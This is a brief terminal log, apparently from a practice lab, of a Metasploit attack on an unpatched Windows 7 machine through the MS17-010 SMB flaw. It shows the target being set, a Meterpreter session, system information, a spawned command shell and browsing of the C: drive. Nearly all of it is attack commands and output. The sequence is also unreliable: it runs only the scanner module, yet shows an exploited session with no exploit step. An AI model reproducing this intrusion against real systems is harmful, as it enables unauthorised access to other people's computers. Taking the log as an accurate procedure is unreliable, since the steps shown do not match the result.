Metasploit Win7
Metasploit Win7
root@kali:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.9.108.150
rhost => 10.9.108.150
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
meterpreter >
meterpreter > sysinfo
Computer : WIN-4FNJFAGB7R3
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd\
cd\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEAA-2E88
Directory of C:\
C:\>cd hacked
cd hacked
C:\hacked>